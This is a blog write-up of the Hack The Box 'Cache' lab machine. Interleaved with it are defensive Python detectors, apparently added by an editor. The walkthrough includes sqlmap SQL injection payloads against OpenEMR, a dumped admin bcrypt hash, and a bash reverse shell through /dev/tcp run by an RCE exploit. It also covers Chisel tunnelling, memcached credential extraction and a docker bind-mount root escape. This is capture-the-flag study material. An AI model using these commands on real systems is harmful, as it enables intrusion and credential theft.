Daniel Cano Merchán - Hacking & Tech

Writeup Hackthebox HTB Cache

0 - Basic info

OS: Linux


1 - Reconnaissance and enumeration

sudo nmap -sS -sV -sC -O
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 23:02 CEST
Nmap scan report for
Host is up (0.044s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.38 seconds

nmap -Pn -n -sV --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 23:06 CEST
Nmap scan report for
Host is up (0.048s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE   VERSION
22/tcp   open     ssh       OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp   open     http      Apache httpd 2.4.29 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=
|   Found the following possible CSRF vulnerabilities: 
|     Path:
|     Form id: fname
|     Form action: contactus.html#
|     Path:
|     Form id: loginform
|_    Form action: net.html
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /login.html: Possible admin folder
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.29: 
|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-10081  5.0     https://vulners.com/cve/CVE-2019-10081
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2019-0197   4.9     https://vulners.com/cve/CVE-2019-0197
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763
|_      CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
2107/tcp filtered msmq-mgmt
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.87 seconds

Nothing interesting at first sight.

Checking port 80, there is a login form.

I tried to brute-force it with common passwords, without luck.

So I manually checked the page source:


    var error_correctPassword = false;
    var error_username = false;
    // Both checks run client-side, so the expected values are readable by anyone viewing the source
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'H@v3_fun'){
            alert("Password didn't Match");
            error_correctPassword = true;
        }
    }
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
            error_username = true;
        }
    }
    $("#loginform").submit(function(event) {
        /* Act on the event */
        error_correctPassword = false;
        error_username = false;
        // the validators set the two flags above
        checkCorrectPassword();
        checkCorrectUsername();
        if(error_correctPassword == false && error_username == false){
            return true;
        } else {
            return false;
        }
    });

So the password is H@v3_fun, but using it here does nothing; saved for later.

I also got another username from the source, John, because of this image tag:

<img src="logo1.png" alt="John" style="width:100%">

Apache directory listing is also enabled, leaking the OS and Apache version.

I was stuck for a while, then I came back to the login page. After the successful login I saw a reference to HMS, Hospital Management System. It caught my attention because it is totally different from the hacker content the rest of the blog has.

Checking on Google, it is a kind of CMS or software for medical/doctor administration.

I searched for references on the host and finally discovered that it has another hostname, so I added it to my /etc/hosts: cache.htb hms.htb

Now I can view the OpenEMR login page.

2 - Vulnerability Identification

I tried to brute-force the login page without any luck and started DirBuster, which returned a really large number of results.

Googling again

Checking on exploit-db, there is an exploit to bypass the login:


But it did not work, maybe because of the version.

So finally I discovered this video:


The video says there is a SQL injection on:


I forced the error with -1:



3 - Exploit

I captured the request with Burp Suite and saved it to a file, request.txt:

GET /portal/add_edit_event_user.php?eid=-1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=meu64c25re4gemh5babmve2r50; PHPSESSID=j3bt6qtabctf5euorhg3lme69f
Upgrade-Insecure-Requests: 1


sqlmap -r request.txt
 ___ ___[.]_____ ___ ___  {1.4.7#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:38:14 /2020-08-03/

[20:38:14] [INFO] parsing HTTP request from 'request.txt'
[20:38:14] [WARNING] it appears that you have provided tainted parameter values ('eid=-1') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[20:38:29] [INFO] testing connection to the target URL
[20:38:30] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[20:38:30] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:38:30] [INFO] testing if the target URL content is stable
[20:38:30] [INFO] target URL content is stable
[20:38:30] [INFO] testing if GET parameter 'eid' is dynamic
[20:38:30] [WARNING] GET parameter 'eid' does not appear to be dynamic
[20:38:30] [INFO] heuristic (basic) test shows that GET parameter 'eid' might be injectable (possible DBMS: 'MySQL')
[20:38:30] [INFO] testing for SQL injection on GET parameter 'eid'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[20:38:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:38:40] [WARNING] reflective value(s) found and filtering out
[20:38:41] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:38:41] [INFO] GET parameter 'eid' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --not-string="row")
[20:38:41] [INFO] testing 'Generic inline queries'
[20:38:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:38:41] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:38:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:38:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:38:42] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:38:42] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:38:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:42] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:38:42] [INFO] GET parameter 'eid' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable 
[20:38:42] [INFO] testing 'MySQL inline queries'
[20:38:42] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:38:42] [WARNING] time-based comparison requires larger statistical model, please wait... (done)
[20:38:42] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:38:42] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:38:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:38:43] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:38:43] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:38:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:38:53] [INFO] GET parameter 'eid' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[20:38:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:38:53] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:38:54] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:38:54] [INFO] target URL appears to have 4 columns in query
[20:38:54] [INFO] GET parameter 'eid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'eid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
Parameter: eid (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: eid=(SELECT (CASE WHEN (2161=2161) THEN 0x2d31 ELSE (SELECT 3529 UNION SELECT 3223) END))

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: eid=-1 AND EXTRACTVALUE(5916,CONCAT(0x5c,0x717a6b7071,(SELECT (ELT(5916=5916,1))),0x71706a6a71))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: eid=-1 AND (SELECT 3259 FROM (SELECT(SLEEP(5)))eVqd)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: eid=-1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a6b7071,0x4c78526f76514b4552714c6f596873486f64554561686e68704946414d4e54415453725142684e6a,0x71706a6a71),NULL-- -
[20:39:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[20:39:02] [INFO] fetched data logged to text files under '/home/u915/.local/share/sqlmap/output/hms.htb'

[*] ending @ 20:39:02 /2020-08-03/

[20:42:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[20:42:00] [INFO] fetching database names
[20:42:00] [INFO] retrieved: 'information_schema'
[20:42:00] [INFO] retrieved: 'openemr'
available databases [2]:
[*] information_schema
[*] openemr

Great, it can be exploited. The backend is MySQL and there are two databases: openemr and information_schema.
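From the defender's side, the probing above leaves a clear trace in the web server log. The following is an added example, not part of the original writeup: a small detector that scans Apache combined-format access log lines for the injection pattern used against the eid parameter of /portal/add_edit_event_user.php. The log lines and client IP are constructed; the payload shapes mirror the sqlmap output above.

```python
# Added example (not from the original writeup): scan Apache combined-format
# access log lines for injection attempts against the eid parameter of
# /portal/add_edit_event_user.php, the endpoint sqlmap attacked above.
# The log lines below are constructed; the payload shapes mirror sqlmap's output.
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
SQL_MARKERS = re.compile(r"\b(union|select|sleep|extractvalue|case when|benchmark)\b", re.I)
VULN_PATH = "/portal/add_edit_event_user.php"

def classify(line):
    """Return the reasons a log line looks like an attack on eid ([] if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    reasons = []
    url = urlsplit(m.group("target"))
    if url.path == VULN_PATH:
        # parse_qs percent-decodes values, so encoded payloads are inspected decoded
        for value in parse_qs(url.query, keep_blank_values=True).get("eid", []):
            if not re.fullmatch(r"-?\d+", value):
                reasons.append("non-numeric eid: %r" % value)  # the app expects an event id
            if SQL_MARKERS.search(value):
                reasons.append("SQL keywords in eid")
    if "sqlmap" in m.group("ua").lower():
        reasons.append("sqlmap user-agent")
    return reasons

def scan(lines):
    """Map line index -> reasons for every suspicious line."""
    hits = {}
    for i, line in enumerate(lines):
        reasons = classify(line)
        if reasons:
            hits[i] = reasons
    return hits

SAMPLE_LOG = [  # constructed sample lines
    '10.10.14.2 - - [03/Aug/2020:20:38:30 +0200] "GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.10.14.2 - - [03/Aug/2020:20:38:42 +0200] "GET /portal/add_edit_event_user.php?eid=-1%20AND%20EXTRACTVALUE(5916,CONCAT(0x5c,0x717a6b7071)) HTTP/1.1" 200 6001 "-" "Mozilla/5.0"',
    '10.10.14.2 - - [03/Aug/2020:20:38:54 +0200] "GET /portal/add_edit_event_user.php?eid=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL--%20- HTTP/1.1" 200 5980 "-" "sqlmap/1.4.7#stable (http://sqlmap.org)"',
    '10.10.14.2 - - [03/Aug/2020:20:39:01 +0200] "GET /portal/index.php HTTP/1.1" 200 3310 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_LOG).items():
        print(idx, reasons)
```

Note that a changed User-Agent hides only the last check; the non-numeric eid and SQL keyword checks key on the request itself.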

Extracting the data

Next step is to dump useful data:

sqlmap -r request.txt --tables -D openemr
| array                                 |
| groups                                |
| sequences                             |
| version                               |

[... redacted because it was too long]

| therapy_groups_participants           |
| transactions                          |
| user_settings                         |
| users                                 |
| users_facility                        |
| users_secure                          |
| valueset                              |
| voids                                 |
| x12_partners                          |

A lot of stuff here, but I want the juicy users and passwords:

sqlmap -r request.txt --dump -D openemr -T users_secure

Database: openemr
Table: users_secure
[1 entry]
| id   | salt                           | username      | password                                                     | last_update         | salt_history1 | salt_history2 | password_history1 | password_history2 |
| 1    | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL          | NULL          | NULL              | NULL              |

[20:47:37] [INFO] table 'openemr.users_secure' dumped to CSV file '/home/u915/.local/share/sqlmap/output/hms.htb/dump/openemr/users_secure.csv'
[20:47:37] [INFO] fetched data logged to text files under '/home/u915/.local/share/sqlmap/output/hms.htb'

[*] ending @ 20:47:37 /2020-08-03/

Ok, so the username is openemr_admin and the password hash is the bcrypt value from the users_secure row above.


Cracking the hash with John

sudo john -wordlist=/usr/share/wordlists/rockyou.txt hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx           (?)
1g 0:00:00:00 DONE (2020-08-03 20:54) 2.439g/s 2063p/s 2063c/s 2063C/s tristan..princesita
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Hmmm, the password is:


Using the password to log in, I discovered the real version of OpenEMR. The exploits I tried at the beginning did not work because of the version and patching.

But… there is another authenticated RCE exploit:


All I need is the cracked password and the username I used to log in to OpenEMR:


Reverse shell

Upgrade to a reverse shell, because working in the webshell is hard:

Listener on my machine:

nc -lvp 1337


python 45161.py -u "openemr_admin" -p "xxxxxx" -c 'bash -i >& /dev/tcp/ 0>&1' http://hms.htb/


connect to [] from cache.htb [] 33772
bash: cannot set terminal process group (1884): Inappropriate ioctl for device
bash: no job control in this shell

But it is a bad shell…

First I upgraded the shell with Python to get a more interactive TTY:

www-data@cache:/var/www/hms.htb/public_html/interface/main$ python3 -c 'import pty; pty.spawn("/bin/bash")'       

User Ash and flag

Now I can use the previous credentials, ash/H@v3_fun.

www-data@cache:/var/www/hms.htb/public_html/interface/main$ su ash
Password: H@v3_fun

Getting the user flag from /home/ash:

cat user.txt

4 - Post-Exploitation and privilege escalation

Now it is time to escalate privileges.


Testing sudo:

ash@cache:~$ sudo -l
[sudo] password for ash: H@v3_fun

Sorry, user ash may not run sudo on cache.

Bad luck, no sudo enabled.


Checking the processes running on the machine, I discovered the juicy Docker daemon (but ash cannot use it) and also memcached.

memcache  1109  0.0  0.1 425792  4152 ?        Ssl  Aug02   0:19 /usr/bin/memcached -m 64 -p 11211 -u memcache -l -P /var/run/memcached/memcached.pid
root      1110  0.1  1.7 938776 69084 ?        Ssl  Aug02   1:59 /usr/bin/dockerd -H fd://
root      1116  0.0  0.1  72300  6440 ?        Ss   Aug02   0:00 /usr/sbin/sshd -D
root      1117  0.0  1.0 956812 40540 ?        Ssl  Aug02   0:08 /usr/bin/containerd
root      1156  0.0  0.1 288884  6468 ?        Ssl  Aug02   0:02 /usr/lib/policykit-1/polkitd --no-debug
root      1223  0.0  0.0  14888  1968 tty1     Ss+  Aug02   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux

Memcache extraction

Using the Metasploit module to extract credentials:

msf5 auxiliary(gather/memcached_extractor) > show options

Module options (auxiliary/gather/memcached_extractor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    11211            yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)

But first I did port forwarding with Chisel.

Using Python's http.server on my machine to deliver Chisel:

python3 -m http.server 8001
Serving HTTP on port 8001 ( ... - - [03/Aug/2020 21:53:54] "GET /chisel HTTP/1.1" 200 -

On the HTB box:


Chisel server on my machine, with reverse tunnelling enabled:

./chisel server -p 9003 --reverse
2020/08/03 21:51:14 server: Reverse tunnelling enabled
2020/08/03 21:51:14 server: Fingerprint 6c:26:25:39:1c:cf:12:97:9a:d0:d4:04:1b:4b:76:8a
2020/08/03 21:51:14 server: Listening on

ash@cache:~/.local/chisel$ ./chisel client R:11211:
2020/08/03 19:55:38 client: Connecting to ws://
2020/08/03 19:55:38 client: Fingerprint 6c:26:25:39:1c:cf:12:97:9a:d0:d4:04:1b:4b:76:8a
2020/08/03 19:55:38 client: Connected (Latency 42.81155ms)

Now I can easily use Metasploit:

msf5 auxiliary(gather/memcached_extractor) > exploit

[+]       - Found 4 keys

Keys/Values Found for

 Key      Value
 ---      -----
 account  "VALUE account 0 9\r\nafhj556uo\r\nEND\r\n"
 file     "VALUE file 0 7\r\nnothing\r\nEND\r\n"
 passwd   "VALUE passwd 0 9\r\n0n3_p1ec3\r\nEND\r\n"
 user     "VALUE user 0 5\r\nluffy\r\nEND\r\n"

[*]       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
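The values the module prints are raw memcached text-protocol replies. The following is an added example, not part of the original writeup or of the Metasploit module: a parser for that reply format plus two defender checks, which cached keys look like credentials and whether a memcached command line (as seen in the ps output above) restricts listening to loopback. The reply bytes are constructed from the four keys shown above; the command lines with explicit bind addresses are constructed too.

```python
# Added example (not from the original writeup): a parser for memcached
# text-protocol retrieval replies ("VALUE <key> <flags> <bytes>\r\n<data>\r\n...END\r\n"),
# the format the Metasploit module printed above, plus two defender checks: which
# cached keys look like credentials, and whether a memcached command line (as seen
# in ps output) restricts listening to loopback. The reply bytes are constructed
# from the values shown on this page.

def parse_get_response(raw):
    """Parse a memcached 'get' reply into {key: (flags, data_bytes)}.
    Raises ValueError when the declared byte count does not match the data."""
    items, pos = {}, 0
    while True:
        nl = raw.find(b"\r\n", pos)
        if nl < 0:
            raise ValueError("truncated reply, no END")
        header = raw[pos:nl]
        if header == b"END":
            return items
        parts = header.split()
        if len(parts) not in (4, 5) or parts[0] != b"VALUE":  # 5th field is an optional cas id
            raise ValueError("unexpected line: %r" % header)
        key, flags, nbytes = parts[1].decode(), int(parts[2]), int(parts[3])
        start = nl + 2
        data = raw[start:start + nbytes]
        if len(data) != nbytes or raw[start + nbytes:start + nbytes + 2] != b"\r\n":
            raise ValueError("length mismatch for key %s" % key)
        items[key] = (flags, data)
        pos = start + nbytes + 2

CREDENTIAL_KEY_HINTS = ("pass", "pwd", "secret", "token", "user", "account")

def credential_like_keys(items):
    """Keys whose names suggest they hold secrets; on this box: account, passwd, user."""
    return sorted(k for k in items if any(h in k.lower() for h in CREDENTIAL_KEY_HINTS))

def memcached_bound_to_loopback(cmdline):
    """True if every -l address on a memcached command line is a loopback address.
    Without -l, memcached listens on all interfaces."""
    args = cmdline.split()
    addrs = []
    for i, a in enumerate(args[:-1]):
        if a == "-l":
            addrs.extend(args[i + 1].split(","))   # -l accepts a comma-separated list
    if not addrs:
        return False
    for a in addrs:
        if a.startswith("["):                       # [::1]:11211
            host = a[1:a.index("]")]
        elif a.count(":") > 1:                      # bare IPv6 address
            host = a
        else:                                       # 127.0.0.1 or 127.0.0.1:11211
            host = a.split(":")[0]
        if host not in ("127.0.0.1", "localhost", "::1"):
            return False
    return True

# Constructed reply, equivalent to the four keys the module found above
SAMPLE_REPLY = (b"VALUE account 0 9\r\nafhj556uo\r\n"
                b"VALUE file 0 7\r\nnothing\r\n"
                b"VALUE passwd 0 9\r\n0n3_p1ec3\r\n"
                b"VALUE user 0 5\r\nluffy\r\n"
                b"END\r\n")

if __name__ == "__main__":
    cached = parse_get_response(SAMPLE_REPLY)
    print("credential-like keys:", credential_like_keys(cached))
```

Binding to loopback would not have helped on this box, since ash was already a local user and memcached has no authentication; the real fix is not to cache credentials in plaintext at all.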

Great, new credentials: user luffy with password 0n3_p1ec3.


Log in as luffy

Now I can use the credentials to log in as luffy on the system.

luffy@cache:/var/www/hms.htb/public_html/interface/main$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

Good, luffy is in the docker group.

Root and flag

Docker is in GTFOBins, so let's go:


luffy@cache:/var/www/hms.htb/public_html/interface/main$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
ubuntu              latest              2ca708c1c9cc        10 months ago       64.2MB

The only Docker image available is ubuntu.

luffy@cache:/var/www/hms.htb/public_html/interface/main$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash


root@92a12207d8d2:/# whoami
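Membership of the docker group is root-equivalent, which is exactly what the bind mount above exploits. The following is an added example, not part of the original writeup: a host-side audit that lists docker group members from /etc/group-style text and checks a container's HostConfig (the structure `docker inspect` returns) for bind mounts of sensitive host paths such as the `-v /:/mnt` used above. The group file and inspect output below are constructed.

```python
# Added example (not from the original writeup): a host-side audit for the
# escalation path used above. It reads /etc/group-style text to list members of
# the docker group (root-equivalent, since dockerd runs as root) and checks a
# container's HostConfig, as returned by `docker inspect`, for bind mounts of
# sensitive host paths such as the '-v /:/mnt' used above. Inputs are constructed.
import json

SENSITIVE_HOST_PATHS = ("/etc", "/root", "/var/run/docker.sock")

def docker_group_members(group_text):
    """Return the members listed for the 'docker' group in /etc/group content."""
    for line in group_text.splitlines():
        fields = line.split(":")          # name:password:gid:member,member
        if len(fields) == 4 and fields[0] == "docker":
            return [m for m in fields[3].split(",") if m]
    return []

def is_sensitive_host_path(path):
    """The host root, or anything under a sensitive directory, means full host compromise."""
    if path == "/":
        return True
    return any(path == p or path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)

def risky_binds(host_config):
    """Return (host_path, container_path) for every sensitive bind in HostConfig.Binds."""
    found = []
    for bind in host_config.get("Binds") or []:
        parts = bind.split(":")            # host_path:container_path[:options]
        if len(parts) < 2 or not parts[0].startswith("/"):
            continue                       # named volume, no host path involved
        if is_sensitive_host_path(parts[0]):
            found.append((parts[0], parts[1]))
    return found

def audit(group_text, inspect_json):
    """Combine both checks into a list of human-readable findings."""
    findings = ["user %s is in the docker group (root-equivalent)" % m
                for m in docker_group_members(group_text)]
    for c in json.loads(inspect_json):
        hc = c.get("HostConfig", {})
        cid = c.get("Id", "?")[:12]
        for host_path, cpath in risky_binds(hc):
            findings.append("container %s bind-mounts host %s at %s" % (cid, host_path, cpath))
        if hc.get("Privileged"):
            findings.append("container %s runs privileged" % cid)
    return findings

# Constructed inputs modelled on the box above
SAMPLE_GROUP = "root:x:0:\nash:x:1000:\nluffy:x:1001:\ndocker:x:999:luffy\n"
SAMPLE_INSPECT = json.dumps([{"Id": "92a12207d8d2" + "0" * 52,
                              "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False}}])

if __name__ == "__main__":
    for f in audit(SAMPLE_GROUP, SAMPLE_INSPECT):
        print("[!]", f)
```

On a real host, feed it `cat /etc/group` and `docker inspect $(docker ps -aq)`; an empty docker group and no findings from running containers is the state to aim for.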

Finally, getting the root flag:

root@92a12207d8d2:/# cat /root/root.txt

Thanks for reading!